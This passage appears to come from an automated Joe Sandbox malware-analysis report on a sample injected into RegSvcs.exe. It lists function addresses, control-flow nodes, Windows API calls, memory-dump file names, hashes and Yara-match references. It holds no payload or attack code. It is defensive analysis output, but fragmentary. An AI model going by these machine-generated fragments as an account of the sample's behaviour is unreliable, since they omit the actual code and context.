
                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 211 95f9f0-95fa05 LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                              • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                              • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                              • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                              Function 0095FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 212 95fae8-95fafd LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                              • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                              • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                              • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                              Function 0095FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 213 95fb68-95fb7d LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                              • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                              • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                              • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                              Function 0095FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 214 95fdc0-95fdd5 LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                              • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                              • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                              • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                              Function 00414394 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 414394-414396 1 414416-414425 0->1 2 414398 0->2 4 41442b-41445d call 404703 call 425193 1->4 5 414426 call 417ba3 1->5 3 41439a-41439f 2->3 3->3 7 4143a1-4143bd 3->7 11 41447d-414483 4->11 12 41445f-41446e PostThreadMessageW 4->12 5->4 7->1 12->11 13 414470-41447a 12->13 13->11
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(00255Of2,00000111,00000000,00000000), ref: 0041446A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 00255Of2$00255Of2
                                                                                                              • API String ID: 1836367815-1393866396
                                                                                                              • Opcode ID: 9860275234762560e8388b943211996fd88b7c3e1b0927fae24cd3b5fccd8234
                                                                                                              • Instruction ID: 6841680170837e414d8ee68ffd14d9f00d419d1a13f685439b822e3a075bcc9b
                                                                                                              • Opcode Fuzzy Hash: 9860275234762560e8388b943211996fd88b7c3e1b0927fae24cd3b5fccd8234
                                                                                                              • Instruction Fuzzy Hash: 711129B2A121587BCB015AA09C81DEE7B6CDE81359B008069FD84B7201D3385D4747A5
                                                                                                              Function 004143E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(00255Of2,00000111,00000000,00000000), ref: 0041446A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 00255Of2$00255Of2
                                                                                                              • API String ID: 1836367815-1393866396
                                                                                                              • Opcode ID: 2f9239dcebfa159d144bb7b503f5921b80f229cabf01115bab1575a27a12cceb
                                                                                                              • Instruction ID: 271a2faaa591c9d6e6db1e9cfa2c7167dbdbf6c6ec6a1f64b8afccaa123d4c6c
                                                                                                              • Opcode Fuzzy Hash: 2f9239dcebfa159d144bb7b503f5921b80f229cabf01115bab1575a27a12cceb
                                                                                                              • Instruction Fuzzy Hash: 5811C6B2D0121C7EDB119AA19C82EEF7B7CDF45398F448069FA4477101D7785E078BA5
                                                                                                              Function 004143F3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 28 4143f3-414405 29 41440d-41445d call 42f5b3 call 417ba3 call 404703 call 425193 28->29 30 414408 call 42eba3 28->30 39 41447d-414483 29->39 40 41445f-41446e PostThreadMessageW 29->40 30->29 40->39 41 414470-41447a 40->41 41->39
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(00255Of2,00000111,00000000,00000000), ref: 0041446A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 00255Of2$00255Of2
                                                                                                              • API String ID: 1836367815-1393866396
                                                                                                              • Opcode ID: 5897684b17c08d4a3b3ea78ede45f027ff82af3d0e962109e8e6aa413f46b121
                                                                                                              • Instruction ID: 641d106764bd7871e54fb13008b0cf28b80202d8a7b94a19ddae20a9823ec020
                                                                                                              • Opcode Fuzzy Hash: 5897684b17c08d4a3b3ea78ede45f027ff82af3d0e962109e8e6aa413f46b121
                                                                                                              • Instruction Fuzzy Hash: 2F0188B2D0111C7EDB11AAE19C81EEF7B7C9F41798F448069FA0477241D6785E0647B5
                                                                                                              Function 00414484 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 42 414484-41448a 43 414436-41443b 42->43 44 41448c-414499 42->44 49 414441-41445d 43->49 50 41443c call 425193 43->50 45 41449b-41449f 44->45 47 4144a1-4144a6 45->47 48 4144bd-4144c3 45->48 47->48 51 4144a8-4144ad 47->51 48->45 52 4144c5-4144c8 48->52 53 41447d-414483 49->53 54 41445f-41446e PostThreadMessageW 49->54 50->49 51->48 55 4144af-4144b6 51->55 54->53 56 414470-41447a 54->56 57 4144c9-4144cc 55->57 58 4144b8-4144bb 55->58 56->53 58->48 58->57
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(00255Of2,00000111,00000000,00000000), ref: 0041446A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 00255Of2$00255Of2
                                                                                                              • API String ID: 1836367815-1393866396
                                                                                                              • Opcode ID: e7479979648abe3028effaf804185b3def2a08024c7416f77b91b1d580e97353
                                                                                                              • Instruction ID: 6aa23fba1bcc85a00ba6234f2f4255416af2484868e621a0598437d85ff41d12
                                                                                                              • Opcode Fuzzy Hash: e7479979648abe3028effaf804185b3def2a08024c7416f77b91b1d580e97353
                                                                                                              • Instruction Fuzzy Hash: DE117A71D145882EDB308EB44C81EEB7B689B85364F4883DEE998873A1D3398C82C759
                                                                                                              Function 0042CD43 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 191 42cd43-42cd84 call 404753 call 42dc33 RtlAllocateHeap
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(?,0041E91E,?,?,00000000,?,0041E91E,?,?,?), ref: 0042CD7F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: b291422afab1277ff62b94335d034247e40cb8db2e1ee972acb18dbd04f5ce06
                                                                                                              • Instruction ID: 984be99464ea8a0e511d9b0ad4bece1192f89614f68eacda88fea4aeccd9f592
                                                                                                              • Opcode Fuzzy Hash: b291422afab1277ff62b94335d034247e40cb8db2e1ee972acb18dbd04f5ce06
                                                                                                              • Instruction Fuzzy Hash: 4CE06D762002087FC614EF59DC41E9B73ADEFC9714F004019FA08A7241D7B0B9118BB5
                                                                                                              Function 0042CD93 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 196 42cd93-42cdd4 call 404753 call 42dc33 RtlFreeHeap
                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,985BA8BF,00000007,00000000,00000004,00000000,00417425,000000F4), ref: 0042CDCF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3298025750-0
                                                                                                              • Opcode ID: d895ccf3f795f216020c7fb14d416f54cb9af9c4f1d97725b2e4c10ec2a29cc2
                                                                                                              • Instruction ID: d073d98c3614cad591f8c5c415a8273d31031a41d69a7a76661ae20d9a26413d
                                                                                                              • Opcode Fuzzy Hash: d895ccf3f795f216020c7fb14d416f54cb9af9c4f1d97725b2e4c10ec2a29cc2
                                                                                                              • Instruction Fuzzy Hash: 39E06D722002087BC614EE59EC41F9B77ACDFC5754F008019FA18A7241C6B0BA10C7B9
                                                                                                              Function 0042CDE3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 206 42cde3-42ce1c call 404753 call 42dc33 ExitProcess
                                                                                                              APIs
                                                                                                              • ExitProcess.KERNELBASE(?,00000000,00000000,?,6C50F49A,?,?,6C50F49A), ref: 0042CE17
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExitProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 621844428-0
                                                                                                              • Opcode ID: 4bb5dac981b431e742f4426a8473249ad855d4829b79789bbbb5ca46e6b896fc
                                                                                                              • Instruction ID: def3be7616ed772aff3aca2395beef2229bc1b2c901884df9646eac8241c3065
                                                                                                              • Opcode Fuzzy Hash: 4bb5dac981b431e742f4426a8473249ad855d4829b79789bbbb5ca46e6b896fc
                                                                                                              • Instruction Fuzzy Hash: 75E04F722002187BD620BA5AEC41F97BB6CDFC5754F50801AFA0877282C6B0B901C7B4

                                                                                                              Non-executed Functions

                                                                                                              Function 00950080 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: [Pj
                                                                                                              • API String ID: 0-2289356113
                                                                                                              • Opcode ID: 75b023be2a6397d0db5a3a592818f93c5726008aa0864a5522c2052616007c6f
                                                                                                              • Instruction ID: 349f4fe387ee5cda82cbe8f8c63ca6131e3e54e4615bd7bc2604f548652b901b
                                                                                                              • Opcode Fuzzy Hash: 75b023be2a6397d0db5a3a592818f93c5726008aa0864a5522c2052616007c6f
                                                                                                              • Instruction Fuzzy Hash: F8F06D31208244ABEB22DB21CC85F2A7BA9BFC5755F14C858FD456A0D3C7769825E721
                                                                                                              Function 009726F8 Relevance: .0, Instructions: 44COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                              • Instruction ID: 76f608394c17b2da61c0e60d7b396822e6560d31d6cc7678428f468fa45b9427
                                                                                                              • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                              • Instruction Fuzzy Hash: 4DF0C222338559EBDB4CEB189E5176A33D9EBD4300F54C479ED4DCB251E635FE408290
                                                                                                              Function 009B0101 Relevance: .0, Instructions: 31COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                                              • Instruction ID: 4bec559f593e5d47a3bc5f79a773f0aeb130f806078ec80f670f1fd65bdb42ce
                                                                                                              • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                                              • Instruction Fuzzy Hash: 14F082722442059FCB1CCF08C590BFA37B6ABC0729F24442CE50B8F690D7399841CA54
                                                                                                              Function 009500EA Relevance: .0, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cb8af7aa9a81ef4f09a324af8e75dea321915fd1f60e836077ae915958704750
                                                                                                              • Instruction ID: 32be73e2ce1e0df7ccaeb7d8c947fe8e0b14866a8df86d8aae9dffda956c7520
                                                                                                              • Opcode Fuzzy Hash: cb8af7aa9a81ef4f09a324af8e75dea321915fd1f60e836077ae915958704750
                                                                                                              • Instruction Fuzzy Hash: A4E01A71549B81CBD321DF15D901B1AB3E4FFC9B11F15483AF80A97750D7789A09CA52
                                                                                                              Function 009600C4 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                              • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                              • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                              • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                              Function 00960048 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                              • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                              • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                              • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                                              Function 00960078 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
